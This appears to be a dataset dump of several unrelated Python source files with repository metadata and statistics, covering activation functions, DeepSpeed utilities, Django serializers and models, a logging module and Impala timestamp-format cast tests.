assert len(pyradamsa.Radamsa(seed=1337).fuzz(data)) == 201 | 26.133333 | 71 | 0.687925 | 174 | 1,176 | 4.528736 | 0.33908 | 0.182741 | 0.086294 | 0.045685 | 0.101523 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050672 | 0.177721 | 1,176 | 45 | 72 | 26.133333 | 0.764219 | 0 | 0 | 0 | 0 | 0 | 0.105353 | 0.035684 | 0 | 0 | 0 | 0 | 0.371429 | 1 | 0.228571 | false | 0.057143 | 0.142857 | 0.028571 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
960972a213a2328e945c8a5d810eae1623b4c98d | 2,363 | py | Python | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | 3 | 2021-06-14T08:23:00.000Z | 2022-03-04T06:00:50.000Z | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | null | null | null | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import math
import torch
from torch import nn
def build_activation(activation: str):
""" Builder function that returns a nn.module activation function.
:param activation: string defining the name of the activation function.
Activations available:
GELU, Swish + every native pytorch activation function.
"""
if hasattr(nn, activation):
return getattr(nn, activation)()
elif activation == "Swish":
return Swish()
elif activation == "GELU":
return GELU()
else:
raise Exception("{} invalid activation function.".format(activation))
def swish(input):
"""
Applies Swish element-wise: A self-gated activation function
swish(x) = x * sigmoid(x)
"""
return input * torch.sigmoid(input)
class Swish(nn.Module):
"""
Applies the Swish function element-wise:
Swish(x) = x * sigmoid(x)
Shape:
- Input: (N, *) where * means, any number of additional
dimensions
- Output: (N, *), same shape as the input
References:
- Related paper:
https://arxiv.org/pdf/1710.05941v1.pdf
"""
def __init__(self):
"""
Init method.
"""
super().__init__() # init the base class
def forward(self, input):
"""
Forward pass of the function.
"""
return swish(input)
def gelu(x):
""" Implementation of the gelu activation function currently in Google Bert repo (identical to OpenAI GPT).
Also see https://arxiv.org/abs/1606.08415
"""
return (
0.5
* x
* (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
)
class GELU(nn.Module):
"""
Applies the GELU function element-wise:
GELU(x) = 0.5*(1 + tanh(√2/π) * (x + 0.044715 * x^3))
Shape:
- Input: (N, *) where * means, any number of additional
dimensions
- Output: (N, *), same shape as the input
References:
- Related paper:
https://arxiv.org/pdf/1606.08415.pdf
"""
def __init__(self):
"""
Init method.
"""
super().__init__() # init the base class
def forward(self, input):
"""
Forward pass of the function.
"""
return gelu(input)
| 23.39604 | 111 | 0.562421 | 276 | 2,363 | 4.757246 | 0.373188 | 0.082254 | 0.029703 | 0.021325 | 0.34882 | 0.325971 | 0.325971 | 0.325971 | 0.325971 | 0.325971 | 0 | 0.032736 | 0.314854 | 2,363 | 100 | 112 | 23.63 | 0.777641 | 0.506983 | 0 | 0.2 | 0 | 0 | 0.044494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0.1 | 0 | 0.633333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
9611c9fd509515676b6ef58feece6da45d748091 | 883 | py | Python | deepspeed/pt/zero_utils.py | Surfndez/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | 1 | 2020-06-01T15:38:25.000Z | 2020-06-01T15:38:25.000Z | deepspeed/pt/zero_utils.py | AIZOOTech/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | 13 | 2020-09-25T22:42:51.000Z | 2022-03-12T00:40:26.000Z | deepspeed/pt/zero_utils.py | Surfndez/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | null | null | null | import torch
import torch.distributed as dist
def _initialize_parameter_parallel_groups(parameter_parallel_size=None):
data_parallel_size = int(dist.get_world_size())
if parameter_parallel_size is None:
parameter_parallel_size = int(data_parallel_size)
print(data_parallel_size, parameter_parallel_size)
assert data_parallel_size % parameter_parallel_size == 0, \
'world size should be divisible by parameter parallel size'
rank = dist.get_rank()
my_group = None
for i in range(dist.get_world_size() // parameter_parallel_size):
ranks = range(i * parameter_parallel_size, (i + 1) * parameter_parallel_size)
group = torch.distributed.new_group(ranks)
if rank in ranks:
my_group = group
return my_group
def pprint(msg):
if not dist.is_initialized() or dist.get_rank() == 0:
print(msg)
| 35.32 | 85 | 0.719139 | 121 | 883 | 4.92562 | 0.338843 | 0.261745 | 0.317114 | 0.125839 | 0.124161 | 0.124161 | 0 | 0 | 0 | 0 | 0 | 0.004267 | 0.203851 | 883 | 24 | 86 | 36.791667 | 0.843528 | 0 | 0 | 0 | 0 | 0 | 0.064553 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.25 | 0.15 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
824b75271e9eac19617579349ffd5d9ec2226845 | 836 | py | Python | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 8 | 2020-04-23T02:57:04.000Z | 2022-03-17T08:11:23.000Z | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 3 | 2021-03-19T02:30:07.000Z | 2021-09-08T01:10:23.000Z | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 1 | 2020-04-29T06:14:39.000Z | 2020-04-29T06:14:39.000Z | from rest_framework import serializers
from groups.models import AppGroup
from django.contrib.auth import get_user_model
User = get_user_model()
class AppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = (
'id', 'owner', 'name', 'group_category',
'description', 'group_image', 'member'
)
read_only_fields = ('owner', 'member')
class CreateAppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = (
'id', 'owner', 'name', 'group_category',
'description', 'group_image'
)
read_only_fields = ('owner', )
class MembersAppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = ('member', )
| 23.885714 | 61 | 0.624402 | 76 | 836 | 6.697368 | 0.407895 | 0.153242 | 0.182711 | 0.206287 | 0.495088 | 0.495088 | 0.495088 | 0.388998 | 0.388998 | 0.388998 | 0 | 0 | 0.271531 | 836 | 34 | 62 | 24.588235 | 0.835796 | 0 | 0 | 0.416667 | 0 | 0 | 0.145933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
825032ecbed0cd7a43816bbe9c4f775712d7dc1a | 237 | py | Python | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | # smartmirror.py
from utils.display import displayWindow
from utils.weather import Weather
# from utils.train import Wmata
# from utils.clock import Clock
# weather = Weather()
# train = Wmata()
w = displayWindow()
w.root.mainloop()
| 16.928571 | 39 | 0.751055 | 31 | 237 | 5.741935 | 0.451613 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151899 | 237 | 13 | 40 | 18.230769 | 0.885572 | 0.464135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
82517ed9db7d27547e9dc8dd6cfed68f873dbe84 | 133 | py | Python | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | tempo = int(input())
velocida_media = int(input())
gasto_carro = 12
distancia = velocida_media * tempo
print(f'{distancia / 12:.3f}') | 26.6 | 34 | 0.714286 | 19 | 133 | 4.842105 | 0.631579 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042735 | 0.120301 | 133 | 5 | 35 | 26.6 | 0.74359 | 0 | 0 | 0 | 0 | 0 | 0.149254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
825d1fc62edebeb1078edfd41ea57c7e4417c55d | 844 | py | Python | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 24 | 2019-08-13T02:39:01.000Z | 2022-03-03T15:44:54.000Z | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 4 | 2021-05-03T16:58:53.000Z | 2021-12-21T21:01:02.000Z | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 11 | 2019-07-28T09:11:40.000Z | 2022-03-17T08:08:27.000Z | import os
import unittest
from uavcan.dsdl import common
class TestCRC16FromBytes(unittest.TestCase):
def test_str(self):
self.assertEqual(common.crc16_from_bytes('123456789'), 0x29B1)
def test_bytes(self):
self.assertEqual(common.crc16_from_bytes(b'123456789'), 0x29B1)
def test_bytearray(self):
self.assertEqual(
common.crc16_from_bytes(bytearray('123456789', 'utf-8')),
0x29B1)
class TestBytesFromCRC64(unittest.TestCase):
def test_zero(self):
self.assertEqual(common.bytes_from_crc64(0),
b"\x00\x00\x00\x00\x00\x00\x00\x00")
def test_check_val(self):
self.assertEqual(common.bytes_from_crc64(0x62EC59E3F1A4F00A),
b"\x0A\xF0\xA4\xF1\xE3\x59\xEC\x62")
if __name__ == '__main__':
unittest.main()
| 27.225806 | 71 | 0.662322 | 103 | 844 | 5.194175 | 0.407767 | 0.078505 | 0.100935 | 0.233645 | 0.409346 | 0.409346 | 0.409346 | 0 | 0 | 0 | 0 | 0.136778 | 0.220379 | 844 | 30 | 72 | 28.133333 | 0.676292 | 0 | 0 | 0 | 0 | 0 | 0.123223 | 0.075829 | 0 | 0 | 0.042654 | 0 | 0.238095 | 1 | 0.238095 | false | 0 | 0.142857 | 0 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
825efd699cccd09b54702507425048855fd758bc | 301 | py | Python | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth import get_user_model
from rest_framework import viewsets
from {{ cookiecutter.project_slug }}.api.serializers import UserSerializer
User = get_user_model()
class User(viewsets.ReadOnlyModelViewSet):
serializer_class = UserSerializer
queryset = User.objects.all()
| 25.083333 | 74 | 0.803987 | 36 | 301 | 6.527778 | 0.638889 | 0.059574 | 0.102128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122924 | 301 | 11 | 75 | 27.363636 | 0.890152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.428571 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
82614460909a389968db1eaa29f2631660d70dea | 176 | py | Python | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | def sumValues(a, b, *others):
retValue = a + b
# Tham số 'others' giống như một mảng.
for other in others:
retValue = retValue + other
return retValue | 22 | 42 | 0.613636 | 24 | 176 | 4.5 | 0.666667 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.301136 | 176 | 8 | 43 | 22 | 0.878049 | 0.204545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8263c1323507252c0b76643727850e458bc712cb | 566 | py | Python | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | class Config:
'''
General configuration parent class
'''
NEWS_API_BASE_URL ='https://newsapi.org/v2/sources?apiKey={}'
ARTICLE_API_BASE_URL = 'https://newsapi.org/v2/everything?sources={}&apiKey={}'
class ProdConfig(Config):
'''
Production configuration child class
Args:
Config: The parent configuration class with general configuration settings
'''
pass
class DevConfig(Config):
'''
Development configuration child class
Args:
Config: The parent configuration class with general configuration settings
'''
DEBUG = True | 23.583333 | 81 | 0.720848 | 64 | 566 | 6.28125 | 0.453125 | 0.149254 | 0.049751 | 0.074627 | 0.59204 | 0.59204 | 0.59204 | 0.457711 | 0.457711 | 0.457711 | 0 | 0.004274 | 0.173145 | 566 | 24 | 82 | 23.583333 | 0.854701 | 0.485866 | 0 | 0 | 0 | 0 | 0.376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
826514812a859c92069a060dc805deeaf6c03969 | 231 | py | Python | lib/feature_lib.py | AlphaTac/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | 1 | 2018-05-05T16:50:06.000Z | 2018-05-05T16:50:06.000Z | lib/feature_lib.py | AlphaTac-AI/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | 3 | 2018-05-26T10:56:30.000Z | 2018-05-26T10:58:45.000Z | lib/feature_lib.py | AlphaTac/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | null | null | null | import gc
def build_features(df, feature_pipeline):
feature_set=set()
for fun in feature_pipeline:
df, feature_set=fun(df, feature_set)
df = df[list(feature_set)]
gc.collect()
return df, feature_set
| 17.769231 | 44 | 0.679654 | 34 | 231 | 4.382353 | 0.441176 | 0.33557 | 0.241611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225108 | 231 | 12 | 45 | 19.25 | 0.832402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
826c4178e2b4d3fcec899caad86208514657b500 | 2,051 | py | Python | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.utils.safestring import mark_safe
from cyder.base.utils import classproperty
class BaseModel(models.Model):
"""
Base class for models to abstract some common features.
* Adds automatic created and modified fields to the model.
"""
created = models.DateTimeField(auto_now_add=True, null=True)
modified = models.DateTimeField(auto_now=True, null=True)
class Meta:
abstract = True
get_latest_by = 'created'
def __str__(self):
return unicode(self).encode('ascii', 'replace')
@classproperty
@classmethod
def pretty_type(cls):
return cls.__name__.lower()
@property
def pretty_name(self):
return unicode(self)
def cyder_unique_error_message(self, model_class, unique_check):
"""
Override this method to provide a custom error message for
unique or unique_together fields. It should return a descriptive error
message that ends in a period.
"""
return super(BaseModel, self).unique_error_message(
model_class, unique_check)
def unique_error_message(self, model_class, unique_check):
"""
Don't override this method. Override cyder_unique_error_message
instead.
"""
error = self.cyder_unique_error_message(model_class, unique_check)
kwargs = {}
for field in unique_check:
kwargs[field] = getattr(self, field)
obj = model_class.objects.filter(**kwargs)
if obj and hasattr(obj.get(), 'get_detail_url'):
error = error[:-1] + u' at <a href="{0}">{1}.</a>'.format(
obj.get().get_detail_url(), obj.get())
error = mark_safe(error)
return error
def reload(self):
return self.__class__.objects.get(pk=self.pk)
class ExpirableMixin(models.Model):
expire = models.DateTimeField(null=True, blank=True,
help_text='Format: MM/DD/YYYY')
class Meta:
abstract = True
| 29.724638 | 78 | 0.639688 | 252 | 2,051 | 5.007937 | 0.404762 | 0.066561 | 0.071315 | 0.066561 | 0.158479 | 0.129952 | 0.129952 | 0.068146 | 0 | 0 | 0 | 0.001988 | 0.264261 | 2,051 | 68 | 79 | 30.161765 | 0.834327 | 0.170161 | 0 | 0.102564 | 0 | 0 | 0.047767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.102564 | 0.564103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
827e6541a3442082a9233c50bd7e4118c0694ec2 | 677 | py | Python | geode/utility/Log.py | jjqcat/geode | 157cc904c113cc5e29a1ffe7c091a83b8ec2cf8e | [
"BSD-3-Clause"
] | 75 | 2015-02-08T22:04:31.000Z | 2022-02-26T14:31:43.000Z | geode/utility/Log.py | bantamtools/geode | d906f1230b14953b68af63aeec2f7b0418d5fdfd | [
"BSD-3-Clause"
] | 15 | 2015-01-08T15:11:38.000Z | 2021-09-05T13:27:22.000Z | geode/utility/Log.py | bantamtools/geode | d906f1230b14953b68af63aeec2f7b0418d5fdfd | [
"BSD-3-Clause"
] | 22 | 2015-03-11T16:43:13.000Z | 2021-02-15T09:37:51.000Z | """log module"""
from __future__ import (with_statement,absolute_import)
from contextlib import contextmanager
import platform
if platform.system()=='Windows':
from ..import geode_all as geode_wrap
else:
from .. import geode_wrap
configure = geode_wrap.log_configure
initialized = geode_wrap.log_initialized
cache_initial_output = geode_wrap.log_cache_initial_output
copy_to_file = geode_wrap.log_copy_to_file
finish = geode_wrap.log_finish
write = geode_wrap.log_print
error = geode_wrap.log_error
flush = geode_wrap.log_flush
@contextmanager
def scope(format,*args):
geode_wrap.log_push_scope(format%args)
try:
yield
finally:
geode_wrap.log_pop_scope()
| 24.178571 | 58 | 0.806499 | 99 | 677 | 5.121212 | 0.414141 | 0.213018 | 0.236686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115214 | 677 | 27 | 59 | 25.074074 | 0.846411 | 0.014771 | 0 | 0 | 0 | 0 | 0.01059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.227273 | 0 | 0.272727 | 0.045455 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8287f09e8a12d4ce01a483e2e0986ea088c6b9ee | 32,773 | py | Python | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_beeswax_hs2_dimension
class TestCastWithFormat(ImpalaTestSuite):
@classmethod
def get_workload(self):
return "functional-query"
# Run the basic tests once for Beeaswax and once for HS2. The underlying functionality
# is independent of the file format so make sense to pick one format for testing.
@classmethod
def add_test_dimensions(cls):
super(TestCastWithFormat, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'parquet')
cls.ImpalaTestMatrix.add_dimension(create_beeswax_hs2_dimension())
def test_basic_inputs_from_table(self, vector):
self.run_test_case('QueryTest/cast_format_from_table', vector)
def test_basic_inputs_without_row(self, vector):
# Cast without format clause to cover the default format
result = self.client.execute("select cast('2017-05-01 01:23:45.678912345' as "
"timestamp)")
assert result.data == ["2017-05-01 01:23:45.678912345"]
# Basic input to cover a datetime with timezone scenario
result = self.client.execute("select cast('2017-05-03 08:59:01.123456789PM 01:30'"
"as timestamp FORMAT 'YYYY-MM-DD HH12:MI:SS.FF9PM TZH:TZM')")
assert result.data == ["2017-05-03 20:59:01.123456789"]
# Input that contains shuffled date without time
result = self.client.execute("select cast('12-2010-05' as timestamp format "
"'DD-YYYY-MM')")
assert result.data == ["2010-05-12 00:00:00"]
# Shuffle the input timestamp and the format clause
result = self.client.execute("select cast('59 04-30-2017-05 01PM 01:08.123456789'"
"as timestamp FORMAT 'MI DD-TZM-YYYY-MM TZHPM SS:HH12.FF9')")
assert result.data == ["2017-05-04 20:59:01.123456789"]
# Input and format without separators
# Note, 12:01 HH12 AM is 00:01 with the internal 0-23 representation.
result = self.client.execute("select cast('20170501120159123456789AM-0130' as "
"timestamp FORMAT 'YYYYDDMMHH12MISSFFAMTZHTZM')")
assert result.data == ["2017-01-05 00:01:59.123456789"]
# Shuffled input without separators
result = self.client.execute("select cast('59043020170501PM0108123456789'"
"as timestamp FORMAT 'MIDDTZMYYYYMMTZHPMSSHH12FF9')")
assert result.data == ["2017-05-04 20:59:01.123456789"]
# Separator section lengths differ between input and format
result = self.client.execute("select cast('--2017----05-01-' as "
"timestamp FORMAT '-YYYY--MM---DD---')")
assert result.data == ["2017-05-01 00:00:00"]
# If the input string has unprocessed tokens
result = self.client.execute("select cast('2017-05-01 12:30' as "
"timestamp FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2017-05-01-12:30' as "
"timestamp FORMAT 'YYYY-MM-DD-')")
assert result.data == ["NULL"]
# If the format string has unprocessed tokens
result = self.client.execute("select cast('2017-05-01' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2017-05-01-' as "
"timestamp FORMAT 'YYYY-MM-DD-HH12')")
assert result.data == ["NULL"]
# Timestamp to string types formatting
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as string format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as varchar format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as char(50) format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
# Cast NULL string to timestamp
result = self.client.execute("select cast(cast(NULL as string) as timestamp "
"FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
# Cast NULL timestamp to string
result = self.client.execute("select cast(cast(NULL as timestamp) as string "
"FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
def test_iso8601_format(self):
# Basic string to timestamp scenario
result = self.client.execute("select cast('2018-11-10T15:11:04Z' as "
"timestamp FORMAT 'YYYY-MM-DDTHH24:MI:SSZ')")
assert result.data == ["2018-11-10 15:11:04"]
# ISO8601 format elements are case-insensitive
result = self.client.execute("select cast('2018-11-09t15:11:04Z' as "
"timestamp FORMAT 'YYYY-MM-DDTHH24:MI:SSz')")
assert result.data == ["2018-11-09 15:11:04"]
result = self.client.execute("select cast('2018-11-08T15:11:04z' as "
